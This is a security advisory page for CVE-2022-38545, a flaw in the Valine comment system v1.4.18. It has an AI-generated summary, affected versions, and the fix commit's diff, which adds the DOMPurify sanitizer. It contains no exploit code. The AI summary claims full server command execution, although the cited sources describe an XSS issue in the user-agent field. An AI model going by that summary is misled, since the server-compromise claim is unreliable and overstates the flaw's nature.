VYPR
← All advisories
Critical severityNVD Advisory· Published Sep 19, 2022· Updated Aug 3, 2024

CVE-2022-38545

CVE-2022-38545

Description

Valine v1.4.18 is vulnerable to remote code execution via crafted POST requests due to insufficient input validation.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Valine v1.4.18 is vulnerable to remote code execution via crafted POST requests due to insufficient input validation.

Valine v1.4.18, a comment system, was discovered to contain a remote code execution (RCE) vulnerability. The root cause is insufficient sanitization of user-supplied input in POST requests, leading to arbitrary code execution [1][2][4].

Attackers can exploit this vulnerability by sending a specially crafted POST request to a Valine instance. No authentication is required, as the attacker only needs to reach the comment submission endpoint. The vulnerability is related to the processing of comment fields, such as the user-agent (UA) string, which can be manipulated to inject and execute arbitrary code [3].

Successful exploitation allows an attacker to execute arbitrary commands on the server running Valine. This could lead to full server compromise, data exfiltration, or further lateral movement within the network [4].

A fix has been implemented in commit c40826c5816c98d797a6b1ed8b62bddf73ed4f65 on GitHub [2]. Users are strongly advised to update to the latest version of Valine that includes this patch. No workarounds are documented; updating is the recommended remediation [1][4].

References
  1. GitHub - xCss/Valine: A fast, simple & powerful comment system.
  2. fixed xss and more #400 · xCss/Valine@c40826c
  3. A XSS bug that can execute code(用户恶意修改 评论 的ua可触发XSS执行代码)
  4. NVD - CVE-2022-38545

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
valinenpm
< 1.5.01.5.0

Affected products

2

Patches

1
c40826c5816c

fixed xss and more #400

https://github.com/xCss/ValineHeroJun 24, 2022via ghsa
commit
4 files changed · +46 68
  • dist/Valine.min.js+5 5 modified
  • dist/Valine.Pure.min.js+5 5 modified
  • docs/index.html+34 57 modified
    @@ -1,82 +1,59 @@
-
-
-
-
 <!DOCTYPE html>
 <html lang="zh" class="no-js">
   <head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width,initial-scale=1">
+    <meta http-equiv="x-ua-compatible" content="ie=edge">
+    <meta name="keywords" content="极简风评论系统,社会化评论系统,无后端评论系统,评论系统,comment system,valine comment system,simple &amp; fast,Minimalist style">
     
-      <meta charset="utf-8">
-      <meta name="viewport" content="width=device-width,initial-scale=1">
-      <meta http-equiv="x-ua-compatible" content="ie=edge">
-	  <meta name="keywords" content="极简风评论系统,社会化评论系统,无后端评论系统,评论系统,comment system,valine comment system,simple &amp; fast,Minimalist style">
-      
-        <meta name="description" content="A fast, simple & powerful comment system.">
-      
-      
-        <link rel="canonical" href="https://valine.js.org/">
-      
-      
-        <meta name="author" content="xCss">
-      
-      
-        <meta name="lang:clipboard.copy" content="复制">
-      
-        <meta name="lang:clipboard.copied" content="已复制">
-      
-        <meta name="lang:search.language" content="jp">
-      
-        <meta name="lang:search.pipeline.stopwords" content="True">
-      
-        <meta name="lang:search.pipeline.trimmer" content="True">
-      
-        <meta name="lang:search.result.none" content="没有找到符合条件的结果">
-      
-        <meta name="lang:search.result.one" content="找到 1 个符合条件的结果">
-      
-        <meta name="lang:search.result.other" content="# 个符合条件的结果">
-      
-        <meta name="lang:search.tokenizer" content="[\uff0c\u3002]+">
-      
-      <link rel="shortcut icon" href="./assets/images/favicon.ico">
-      <meta name="generator" content="mkdocs-0.17.3, mkdocs-material-2.7.1">
+      <meta name="description" content="A fast, simple & powerful comment system.">
     
     
-      
-        <title>Valine - A fast, simple & powerful comment system.</title>
-      
+      <link rel="canonical" href="https://valine.js.org/">
     
     
-      <link rel="stylesheet" href="./assets/stylesheets/application.78aab2dc.css">
-      
-        <link rel="stylesheet" href="./assets/stylesheets/application-palette.6079476c.css">
-      
+      <meta name="author" content="xCss">
     
     
-      <script src="./assets/javascripts/modernizr.1aa3b519.js"></script>
+      <meta name="lang:clipboard.copy" content="复制">
+    
+      <meta name="lang:clipboard.copied" content="已复制">
+    
+      <meta name="lang:search.language" content="jp">
     
+      <meta name="lang:search.pipeline.stopwords" content="True">
     
+      <meta name="lang:search.pipeline.trimmer" content="True">
+    
+      <meta name="lang:search.result.none" content="没有找到符合条件的结果">
+    
+      <meta name="lang:search.result.one" content="找到 1 个符合条件的结果">
+    
+      <meta name="lang:search.result.other" content="# 个符合条件的结果">
+    
+      <meta name="lang:search.tokenizer" content="[\uff0c\u3002]+">
+      
+      <link rel="shortcut icon" href="./assets/images/favicon.ico">
+      <meta name="generator" content="mkdocs-0.17.3, mkdocs-material-2.7.1">
+      <title>Valine - A fast, simple & powerful comment system.</title>
+      
+      <link rel="stylesheet" href="./assets/stylesheets/application.78aab2dc.css">
+      
+      <link rel="stylesheet" href="./assets/stylesheets/application-palette.6079476c.css">
+      <script src="./assets/javascripts/modernizr.1aa3b519.js"></script>
       <link href="https://fonts-gstatic.proxy.ustclug.org" rel="preconnect" crossorigin>
       
-        <link rel="stylesheet" href="https://fonts.proxy.ustclug.org/css?family=Ubuntu:300,400,400i,700|Ubuntu+Mono">
-        <style>body,input{font-family:"Ubuntu","Helvetica Neue",Helvetica,Arial,sans-serif}code,kbd,pre{font-family:"Ubuntu Mono","Courier New",Courier,monospace}</style>
+      <link rel="stylesheet" href="https://fonts.proxy.ustclug.org/css?family=Ubuntu:300,400,400i,700|Ubuntu+Mono">
+      <style>body,input{font-family:"Ubuntu","Helvetica Neue",Helvetica,Arial,sans-serif}code,kbd,pre{font-family:"Ubuntu Mono","Courier New",Courier,monospace}</style>
       
       <link rel="stylesheet" href="https://fonts.proxy.ustclug.org/icon?family=Material+Icons">
     
-    
-    
   </head>
-  
-    
     
     <body dir="ltr" data-md-color-primary="white" data-md-color-accent="">
-  
     <svg class="md-svg">
       <defs>
-        
-        
-          <svg xmlns="http://www.w3.org/2000/svg" width="416" height="448"
-    viewBox="0 0 416 448" id="github">
+          <svg xmlns="http://www.w3.org/2000/svg" width="416" height="448" viewBox="0 0 416 448" id="github">
   <path fill="currentColor" d="M160 304q0 10-3.125 20.5t-10.75 19-18.125
         8.5-18.125-8.5-10.75-19-3.125-20.5 3.125-20.5 10.75-19 18.125-8.5
         18.125 8.5 10.75 19 3.125 20.5zM320 304q0 10-3.125 20.5t-10.75
  • package.json+2 1 modified
    @@ -1,6 +1,6 @@
 {
   "name": "valine",
-  "version": "1.4.18",
+  "version": "1.5.0",
   "description": "A simple comment system based on Leancloud.",
   "main": "dist/Valine.min.js",
   "author": "xCss <xioveliu@gmail.com> (https://github.com/xCss)",
@@ -49,6 +49,7 @@
     "balajs": "^1.0.7",
     "balalaika": "^1.0.1",
     "blueimp-md5": "^2.8.0",
+    "dompurify": "^2.3.8",
     "element-closest": "^3.0.2",
     "hanabi": "^0.4.0",
     "insane": "^2.6.2",

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

5

News mentions

0

No linked articles in our index yet.